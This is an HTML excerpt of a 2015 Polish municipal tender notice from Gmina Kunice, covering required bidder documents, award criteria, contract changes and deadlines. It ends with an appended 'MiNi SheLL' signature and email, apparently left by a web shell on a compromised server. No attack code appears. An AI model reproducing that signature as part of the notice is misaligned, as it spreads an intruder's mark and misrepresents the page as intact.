<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności faktury - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Katalog zmian umowy przewidziany jest we wzorze umowy oraz w specyfikacji istotnych warunków zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kunice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kunice, ul. Gwarna 1, 59-216 Kunice, pokój numer 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 08:00, miejsce: Sekretariat Urzędu Gminy Kunice (pokój nr 12) w godzinach pracy Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com